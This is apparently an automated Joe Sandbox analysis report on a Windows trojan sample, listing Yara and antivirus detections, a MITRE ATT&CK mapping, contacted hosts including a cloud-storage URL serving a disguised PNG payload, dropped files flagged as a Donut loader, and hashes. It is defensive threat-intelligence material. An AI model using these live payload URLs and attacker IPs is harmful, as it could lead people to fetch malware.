                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfb94711a5.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.19.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.17.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.27.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba0ab6a1.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba3bec61.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba432c61.53.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.23.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.51.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.37.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.31.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfb923764d.18.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.51.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfba310721.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.35.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba9111ed.42.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.21.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfb9531116.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.2IVWAPeiZm.exe.1cfb9531116.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba031195.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.29.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.24.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.31.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0e5bd1.46.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.30.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0ab6a1.16.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.2IVWAPeiZm.exe.1cfba0711a5.43.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4112489647.000001CFB9530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2285778041.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2629266568.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3349240156.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3706740100.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3726196823.000001CFB9241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1748764856.000001CFB924D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2820150176.000001CFB9237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3368802529.000001CFB923B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1748942831.000001CFB9250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3368874986.000001CFBA031000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3919845681.000001CFBA3F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2820582683.000001CFBA071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1748764856.000001CFB9216000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1797698380.000001CFBA031000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3900454177.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1797698380.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3726241114.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3726279645.000001CFBA071000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3900337582.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2629229655.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2820366657.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3181430469.000001CFB9237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4113444705.000001CFBA432000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3181505839.000001CFBA031000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3919777549.000001CFB9246000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2285716468.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4113319605.000001CFBA3BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2629266568.000001CFBA031000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1925226889.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2453865521.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4113072764.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3919809789.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3006787705.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4112427817.000001CFB9470000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2453718670.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3535968647.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1925169796.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3181469055.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2107170872.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2629153864.000001CFB9237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3368840828.000001CFBA911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2107104468.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3368874986.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.3181505839.000001CFBA0AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.4113319605.000001CFBA310000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 2IVWAPeiZm.exe PID: 7272, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Replication Through Removable Media                    		11
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		1
                    Abuse Elevation Control Mechanism                    		121
                    Input Capture                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading                    		11
                    Obfuscated Files or Information                    		LSASS Memory11
                    Peripheral Device Discovery                    		Remote Desktop Protocol1
                    Screen Capture                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Access Token Manipulation                    		1
                    Software Packing                    		Security Account Manager1
                    File and Directory Discovery                    		SMB/Windows Admin Shares121
                    Input Capture                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook211
                    Process Injection                    		1
                    DLL Side-Loading                    		NTDS16
                    System Information Discovery                    		Distributed Component Object Model2
                    Clipboard Data                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Masquerading                    		LSA Secrets1
                    Query Registry                    		SSHKeylogging3
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Modify Registry                    		Cached Domain Credentials31
                    Security Software Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Virtualization/Sandbox Evasion                    		DCSync1
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Access Token Manipulation                    		Proc Filesystem3
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Indicator Removal                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    2IVWAPeiZm.exe58%ReversingLabsWin64.Trojan.CrypterX
                    2IVWAPeiZm.exe60%VirustotalBrowse
                    2IVWAPeiZm.exe100%AviraHEUR/AGEN.1317284

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    gz.file.myqcloud.com0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/0%Avira URL Cloudsafe
                    https://www.remobjects.com/ps0%Avira URL Cloudsafe
                    https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/eX0%Avira URL Cloudsafe
                    https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/any.pngvector0%Avira URL Cloudsafe
                    http://www.wofficebox.com/0%Avira URL Cloudsafe
                    https://www.innosetup.com/0%Avira URL Cloudsafe
                    https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/any.png0%Avira URL Cloudsafe
                    https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/any.png0%VirustotalBrowse
                    http://www.wofficebox.com/0%VirustotalBrowse
                    https://www.remobjects.com/ps0%VirustotalBrowse
                    https://www.innosetup.com/1%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    gz.file.myqcloud.com
                    		159.75.57.35
                    		truefalseunknown
                    pattern-1326658104.cos.ap-guangzhou.myqcloud.com
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/any.pngfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/eX2IVWAPeiZm.exe, 00000000.00000002.4111407796.000001CFB747C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.wofficebox.com/2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/2IVWAPeiZm.exe, 00000000.00000002.4111407796.000001CFB747C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://pattern-1326658104.cos.ap-guangzhou.myqcloud.com/any.pngvector2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.remobjects.com/ps2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.innosetup.com/2IVWAPeiZm.exe, 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      206.238.115.146
                      		unknownUnited States
                      		174COGENT-174UStrue
                      159.75.57.35
                      		gz.file.myqcloud.comChina
                      		1257TELE2EUfalse

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1467970
                      Start date and time:2024-07-05 07:32:12 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 51s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:5
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:2IVWAPeiZm.exe
                      renamed because original name is a hash value
                      Original Sample Name:06592a8ca068935d98a5ada152e3393d.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@1/2@1/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 66
                      • Number of non-executed functions: 209
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtEnumerateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      01:33:43API Interceptor5619166x Sleep call for process: 2IVWAPeiZm.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      159.75.57.35#U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exeGet hashmaliciousUnknownBrowse

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        gz.file.myqcloud.com#U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exeGet hashmaliciousUnknownBrowse
                        • 159.75.57.36
                        #U75c5#U6bd2#U67e5#U6740#U5de5#U5177.exeGet hashmaliciousUnknownBrowse
                        • 159.75.57.35
                        dllhostpgd.exeGet hashmaliciousCobaltStrikeBrowse
                        • 159.75.57.69
                        dllhostpgd.exeGet hashmaliciousCobaltStrikeBrowse
                        • 159.75.57.69
                        buding.exeGet hashmaliciousUnknownBrowse
                        • 159.75.57.69
                        Q6UkPxz1Bk.exeGet hashmaliciousUnknownBrowse
                        • 159.75.57.69
                        Q6UkPxz1Bk.exeGet hashmaliciousUnknownBrowse
                        • 159.75.57.69
                        #U8d85#U7ea7#U6587#U672cTXT.exeGet hashmaliciousAsyncRAT, DcRat, VenomRATBrowse
                        • 159.75.57.36
                        HZ8Y6MTW1L.exeGet hashmaliciousUnknownBrowse
                        • 159.75.57.69
                        https://fxx922022webapps930-1312962597.cos.ap-guangzhou.myqcloud.com/fx.htm#junruh@greendotcorp.comGet hashmaliciousUnknownBrowse
                        • 159.75.57.36

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        COGENT-174USPTT Group project - Quotation.exeGet hashmaliciousFormBookBrowse
                        • 38.47.232.224
                        adobe_scanner12.exeGet hashmaliciousFormBookBrowse
                        • 38.47.232.185
                        ScanPDF_102.exeGet hashmaliciousFormBookBrowse
                        • 38.55.194.30
                        https://nmg.evlink21.net/Get hashmaliciousUnknownBrowse
                        • 154.59.122.79
                        205.185.124.50-arm-2024-07-03T23_47_53.elfGet hashmaliciousMirai, MoobotBrowse
                        • 154.39.121.31
                        205.185.124.50-x86-2024-07-03T23_47_55.elfGet hashmaliciousMirai, MoobotBrowse
                        • 154.42.40.250
                        CMgd5ZVG2N.elfGet hashmaliciousUnknownBrowse
                        • 38.245.242.130
                        qS7rA9kvqg.elfGet hashmaliciousUnknownBrowse
                        • 160.238.102.21
                        PMcyGpR57k.elfGet hashmaliciousUnknownBrowse
                        • 38.210.131.180
                        buPdHWwrzF.elfGet hashmaliciousUnknownBrowse
                        • 38.14.1.248
                        TELE2EUq9WhhN00yY.elfGet hashmaliciousUnknownBrowse
                        • 90.130.240.6
                        jew.arm.elfGet hashmaliciousUnknownBrowse
                        • 37.198.247.136
                        lQC7IiMNX1.elfGet hashmaliciousMiraiBrowse
                        • 193.234.24.255
                        2T9ShVKj85.elfGet hashmaliciousMiraiBrowse
                        • 90.139.46.165
                        h1dNV0rAcX.elfGet hashmaliciousMiraiBrowse
                        • 83.184.232.22
                        AAMwAy8pB7.elfGet hashmaliciousMirai, MoobotBrowse
                        • 37.2.41.226
                        BNd5XPrLzR.elfGet hashmaliciousMirai, MoobotBrowse
                        • 159.72.219.22
                        BviOG97ArX.elfGet hashmaliciousMirai, MoobotBrowse
                        • 90.133.104.26
                        grxpiPs2Fw.elfGet hashmaliciousMirai, MoobotBrowse
                        • 83.183.88.85
                        pk5zYdkgga.elfGet hashmaliciousMirai, MoobotBrowse
                        • 193.217.123.228

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        37f463bf4616ecd445d4a1937da06e19poMkNYHDU3.exeGet hashmaliciousRemcosBrowse
                        • 159.75.57.35
                        SecuriteInfo.com.FileRepMalware.1111.23697.exeGet hashmaliciousUnknownBrowse
                        • 159.75.57.35
                        lem.exeGet hashmaliciousVidarBrowse
                        • 159.75.57.35
                        file.exeGet hashmaliciousVidarBrowse
                        • 159.75.57.35
                        file.exeGet hashmaliciousBabuk, DjvuBrowse
                        • 159.75.57.35
                        5gO02Ijl9V.exeGet hashmaliciousGuLoaderBrowse
                        • 159.75.57.35
                        ooXgr5BYnA.exeGet hashmaliciousGuLoader, LokibotBrowse
                        • 159.75.57.35
                        7Bkd5ILk1o.exeGet hashmaliciousGuLoader, LokibotBrowse
                        • 159.75.57.35
                        oFNtjcXGVB.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 159.75.57.35
                        Co0Wd0QVRU.exeGet hashmaliciousRemcos, GuLoaderBrowse
                        • 159.75.57.35

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\Public\Pictures\any.png

                        Download File
                        Process:C:\Users\user\Desktop\2IVWAPeiZm.exe
                        File Type:PNG image data, 1468 x 1027, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):1107015
                        Entropy (8bit):7.986890293651004
                        Encrypted:false
                        SSDEEP:24576:v1Ua6MOTSFoan3mshuAg2hPgAeLwaz5jLgrpqsey4vHlvX/M+XIcckqx:ua6MOTg3mt2hIA4wk5jUlq1y4PpE+XIT
                        MD5:C5497A158A878995BB05025560DDAEC2
                        SHA1:03428561F384B78B5109E2D318EE7AF0C5E8DA68
                        SHA-256:A2657071C7C03990291739C0581E4A2863EBE49270C3CA6E3D2D7438EDEBA920
                        SHA-512:584439B18CF9519F3DA5E820482CB412BEEF376B5A6C8D02757B24D04EAE060E6CE11E23E3D7C2CF780C21EBA3C3D85A40D2FD4E707DD4E3F80EF0E246F1A129
                        Malicious:false
                        Yara Hits:
                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\Public\Pictures\any.png, Author: unknown
                        Reputation:low
                        Preview:.PNG........IHDR.............#.z.....pHYs...%...%.IR$.....tEXtSoftware.Snipaste]..... .IDATx...n$..$.Tk..i......i...R.g.*I....MF3'3..}......I:...k...?...~?.....8..<___..l.=??..q....{.v..q....{.="".........{?.#..Oq.p_ooo..!...z.%..........Y-.p.'h....y........y............'........S........LN.o....?........o..#..[k.'....f.<#"...)..yJ.~..8.Z.*K.v.%. .?1.....v....s....|{{..OOO..-.....s.h.y.Ihb........d...$....L...Z..n.....-m-....Z..../FI.-....d.$.B..d[.{...."...'&.SLn.{.c.....o...n.6.Qi.........v...........r..nh.$'[.!..qc.....n...m......T.....3..}.2....!!........H...x{{{....n?~.H.~...T...."...^.L.........8..e/iS..JO..DO.c.Az...c..bA..f..65..6.@9.../>...+]}.~r......%....t...P.:9..U?c6..I..<..(OOO.........O....O.A.&.3....@.O...{..T....6....o..Y....A4A...&|....].1..G...I..........;"..~.h...9....e.08w................$"..x.Os8.H!J+j...>..3.........0I.....F-...py}}M..C.....N.N..Tm.=.k...qg...#.....D.]....DA6.8..u.p.....tT..!..;M.@~...<.L...!.D.F)...$&.E..

                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\any[1].png

                        Download File
                        Process:C:\Users\user\Desktop\2IVWAPeiZm.exe
                        File Type:PNG image data, 1468 x 1027, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):1107015
                        Entropy (8bit):7.986890293651004
                        Encrypted:false
                        SSDEEP:24576:v1Ua6MOTSFoan3mshuAg2hPgAeLwaz5jLgrpqsey4vHlvX/M+XIcckqx:ua6MOTg3mt2hIA4wk5jUlq1y4PpE+XIT
                        MD5:C5497A158A878995BB05025560DDAEC2
                        SHA1:03428561F384B78B5109E2D318EE7AF0C5E8DA68
                        SHA-256:A2657071C7C03990291739C0581E4A2863EBE49270C3CA6E3D2D7438EDEBA920
                        SHA-512:584439B18CF9519F3DA5E820482CB412BEEF376B5A6C8D02757B24D04EAE060E6CE11E23E3D7C2CF780C21EBA3C3D85A40D2FD4E707DD4E3F80EF0E246F1A129
                        Malicious:false
                        Yara Hits:
                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\any[1].png, Author: unknown
                        Reputation:low
                        Preview:.PNG........IHDR.............#.z.....pHYs...%...%.IR$.....tEXtSoftware.Snipaste]..... .IDATx...n$..$.Tk..i......i...R.g.*I....MF3'3..}......I:...k...?...~?.....8..<___..l.=??..q....{.v..q....{.="".........{?.#..Oq.p_ooo..!...z.%..........Y-.p.'h....y........y............'........S........LN.o....?........o..#..[k.'....f.<#"...)..yJ.~..8.Z.*K.v.%. .?1.....v....s....|{{..OOO..-.....s.h.y.Ihb........d...$....L...Z..n.....-m-....Z..../FI.-....d.$.B..d[.{...."...'&.SLn.{.c.....o...n.6.Qi.........v...........r..nh.$'[.!..qc.....n...m......T.....3..}.2....!!........H...x{{{....n?~.H.~...T...."...^.L.........8..e/iS..JO..DO.c.Az...c..bA..f..65..6.@9.../>...+]}.~r......%....t...P.:9..U?c6..I..<..(OOO.........O....O.A.&.3....@.O...{..T....6....o..Y....A4A...&|....].1..G...I..........;"..~.h...9....e.08w................$"..x.Os8.H!J+j...>..3.........0I.....F-...py}}M..C.....N.N..Tm.=.k...qg...#.....D.]....DA6.8..u.p.....tT..!..;M.@~...<.L...!.D.F)...$&.E..

                        Static File Info

                        General

                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                        Entropy (8bit):7.937300315648467
                        TrID:
                        • Win64 Executable GUI (202006/5) 81.26%
                        • UPX compressed Win32 Executable (30571/9) 12.30%
                        • Win64 Executable (generic) (12005/4) 4.83%
                        • Generic Win/DOS Executable (2004/3) 0.81%
                        • DOS Executable Generic (2002/1) 0.81%
                        File name:2IVWAPeiZm.exe
                        File size:11'845'632 bytes
                        MD5:06592a8ca068935d98a5ada152e3393d
                        SHA1:41adfa7ad17a0842b62b227b37ea4778fe7d247d
                        SHA256:acce6a3f4a8de7b556e74279744466adf4ec318a9fc03c639cdbc7f47c60da0d
                        SHA512:3d365860047c0b50a5d4d47e4bc081dfdd138045f847af764daaa24bc5f00edcce1051a028aba82ff9feb757511c30e27b1202e39bf503913aae0404eb77e30c
